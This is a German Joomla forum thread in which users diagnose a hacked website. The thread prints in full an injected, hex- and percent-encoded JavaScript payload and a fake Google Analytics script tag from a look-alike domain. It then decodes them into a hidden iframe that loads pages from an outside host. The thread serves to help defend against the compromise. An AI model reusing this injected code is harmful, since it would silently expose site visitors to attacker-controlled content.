Thema: meine Seite wurde von fremder Hand verlinkt

Hi Cracks!

Wenn Google meine Seite www.atmonis.ch findet, z.B. über "Kreta, Meersicht" (mit diesen Begriffen ist sie ganz oben - was aber noch das einzige erfeuliche ist) und dann der Hyperlink angeklickt wird, KOMMT MAN AUF EINE ANDERE SEITE! (Da reicht ein Wütend-Smiley nicht mehr).

Was kann ich machen?
Hat jemand mein Passwort geknackt?

Version: 1.0.15 Stable
Module:
- astatsPRO
- joomfish
- easybook

Besten Dank!
Ago

EDIT:
http://www.joomlaportal.de/sicherhei...ogle-info.html

Aber so wie ich das sehe ist das eine Google-Such-Seite (http://analytics-google.info). Im Cache ist Deine Seite jedoch noch vorhanden ....

MFG. Ricola

Du hast im Head deiner index.php 2x den Javascript von google-analytics. Ich gehe davon aus das ist nicht korrekt. Zudem solltest Du mal überprüfen, ob der Code in diesem Script korrekt ist, der kommt mir irgendwie seltsam vor, allerdings muss ich auch gestehen, kenne ich mich damit übehaupt nicht aus...

Es liegt recht sicher am fehlerhaften Google Analytics Code

So sollte der aussehen:
https://www.google.com/support/googl...55488&hl=de_DE
(Es gibt da zwei Varianten, steht aber alles beim Link ^^)

Den Code den du benötigst findest du in deinem Google Analytics Konto.
https://www.google.com/support/googl...y?answer=55603

Diesen Code ganz am ende des Template vor das </body>

Das doppelte
<script src="http://analytics-google.info/urchin.js"></script>
muss raus
(und .info ist eigentlich nicht von google??)

Björn

Ps. Und dann hast du noch astatsPRO drin, dann hast du die Statistik ja Doppelt und astatsPRO erzeugt extrem viele Daten in deiner Daten

PPs. und dann schau mal was das für ein kram ist, keine Ahung für was da gut sein soll
<body class="page_bg"><!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a){ function m4857

Letzte Zeile hinter: </html>
<script>check_content()</script><!-- 1213806179 --><!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a)

Zumal auch noch astatsPRO in Betrieb ist... wie viel Statistik braucht einer Seite?

Ich hab genau das gleiche Problem, bei mir in der index.php befinden sich seit gestern diese "Google Analytics" links.

In wirklichkeit kommt diese domain aber nicht von google, sondern von einem Hacker, den ich gestern dabei erwischt habe, wie er diesen Quellcode in meine Seite einbauen wollte!

Man beachte, dass,
http://www.google-analytics.com/urchin.js ---> das offizielle Java-Script von Google
http://www.analytics-google.info/urchin.js ---> und das der eingeschleuste Code vom Hacker ist!

Ausserdem hat bei mir der Hacker folgenden Code eingebaut:

Code:

<script>function c1131313m4857aa739c121(m4857aa739c91a){ function m4857aa739cd0a(){return 16;} return (parseInt(m4857aa739c91a,m4857aa739cd0a()));}function m4857aa739d4f5(m4857aa739d8ed){ var m4857aa739e4d4=2; var m4857aa739dce4='';m4857aa739ecc3=String.fromCharCode;for(m4857aa739e0dd=0;m4857aa739e0dd<m4857aa739d8ed.length;m4857aa739e0dd+=m4857aa739e4d4){ m4857aa739dce4+=(m4857aa739ecc3(c1131313m4857aa739c121(m4857aa739d8ed.substr(m4857aa739e0dd,m4857aa739e4d4))));}return m4857aa739dce4;} var m4857aa739f0bb='3C7363726970743E66756E6374696F6E20636865636B5F636F6E74656E7428297B76617220693D303B7768696C6528646F63756D656E742E676574456C656D656E747342795461674E616D652827696672616D6527292E6C656E677468297B76617220656C3D646F63756D656E742E676574456C656D656E747342795461674E616D652827696672616D6527295B695D3B6966282028656C2E7374796C652E646973706C61793D3D276E6F6E6527207C7C20656C2E7374796C652E7669736962696C697479203D3D2768696464656E27207C7C2028656C2E77696474683C3520262620656C2E6865696768743C35292920262620656C2E6E616D65213D27633127297B656C2E706172656E744E6F64652E72656D6F76654368696C6428656C293B7D656C736520692B2B3B7D7D636865636B5F636F6E74656E7428293B0A696628216D796961297B646F63756D656E742E777269746528756E6573636170652820272533632536392536362537322536312536642536352532302536652536312536642536352533642536332533312532302537332537322536332533642532372536382537342537342537302533612532662532662537362536392537362536392537342537352537332536332536392536312532652536332536662536642532662536392536642536312536372536352537332532662537332537342536312537342537332532652536382537342536642536632533662532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533312533362533392533312533322533382532392532622532372533362536362536352533392536352533382536342533302536312533312533362532372532302537372536392536342537342536382533642533372533382533332532302536382536352536392536372536382537342533642533322533312533362532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E[/SIZE]';document.write(m4857aa739d4f5(m4857aa739f0bb));</script><!-- /ad --><script>check_content()</script>

Wenn man diesen entschlüsselt, kommt heraus, dass folgendes auf die Seite geladen wird:

Code:

	function funktion3(parameter2)
		{ function funktion2()
			{return 16;} 
		return (parseInt(parameter2,funktion2()));}
	
	function funktion1(parameter1)
		{ var variabel1=2;
		var variabel2='';
		variabel3=String.fromCharCode;
		for(variabel4=0; variabel4<parameter1.length; variabel4+=variabel1)
		{ variabel2+=(variabel3(funktion3(parameter1.substr(variabel4,variabel1))));}
		return variabel2;} 
		
		var wert1='3C7363726970743E66756E6374696F6E20636865636B5F636F6E74656E7428297B76617220693D303B7768696C6528646F63756D656E742E676574456C656D656E747342795461674E616D652827696672616D6527292E6C656E677468297B76617220656C3D646F63756D656E742E676574456C656D656E747342795461674E616D652827696672616D6527295B695D3B6966282028656C2E7374796C652E646973706C61793D3D276E6F6E6527207C7C20656C2E7374796C652E7669736962696C697479203D3D2768696464656E27207C7C2028656C2E77696474683C3520262620656C2E6865696768743C35292920262620656C2E6E616D65213D27633127297B656C2E706172656E744E6F64652E72656D6F76654368696C6428656C293B7D656C736520692B2B3B7D7D636865636B5F636F6E74656E7428293B0A696628216D796961297B646F63756D656E742E777269746528756E6573636170652820272533632536392536362537322536312536642536352532302536652536312536642536352533642536332533312532302537332537322536332533642532372536382537342537342537302533612532662532662537362536392537362536392537342537352537332536332536392536312532652536332536662536642532662536392536642536312536372536352537332532662537332537342536312537342537332532652536382537342536642536632533662532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533312533362533392533312533322533382532392532622532372533362536362536352533392536352533382536342533302536312533312533362532372532302537372536392536342537342536382533642533372533382533332532302536382536352536392536372536382537342533642533322533312533362532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';
		document.write(funktion1(wert1));

Dieser wiederrum ist wieder "verschlüsselt" und gibt schlussendlich folgendes auf die Seite aus:

Code:

</script><!-- /ad -->
		**********
		function check_content()
		{
			var i=0;
			while(document.getElementsByTagName('iframe').length)
			{
				var el=document.getElementsByTagName('iframe')[i];
				if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c1')
					{el.parentNode.removeChild(el);}
				else 
					i++;
			}
		}
		
		check_content();
		if(!myia)
		{document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%76%69%76%69%74%75%73%63%69%61%2e%63%6f%6d%2f%69%6d%61%67%65%73%2f%73%74%61%74%73%2e%68%74%6d%6c%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%36%39%31%32%38%29%2b%27%36%66%65%39%65%38%64%30%61%31%36%27%20%77%69%64%74%68%3d%37%38%33%20%68%65%69%67%68%74%3d%32%31%36%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script>
		<script>check_content()</script>

Und wenn man diesen "Verschlüsselten Code" auch hier wieder entschlüsselt sieht man, dass ein IFrame auf die Seite geladen wird:

Code:

<iframe name=c1 src='http://***********/stats.html?'+Math.round(Math.random()*169128)+'6fe9e8d0a16' width=783 height=216 style='display: none'></iframe>

Danke, das Beantwort mein PPS. von oben.
Die URL die da eingebunden wird habe ich mal gelöscht, wir wollen ja nicht noch Werbung dafür machen ;-)

@ Agoraso du solltest deine Seite jetzt schnell mal ganz genau Prüfen!
http://www.joomlaportal.de/sicherhei...tml#post665966

Welche Joomla Version nutzt du?
Welche Erweiterungen sind installiert? (Mit Version)
http://docs.joomla.org/Vulnerable_Extensions_List

Der Hacker kennt deine Passwörter und könnte noch mehr Code eingeschleust haben, kontrollier das also ordentlich.

EDIT:
Bei Google findet man noch mehr Foren in denen seit kurzen nach diesen Code gefragt wird
z.B. Hier:
http://forums.x10hosting.com/free-ho...ease-help.html
Und das Problem dieses Users sollte einem zu denken geben ;-)

Remove? No, it will automatically appear as a ghost! I cannot control that code.

Björn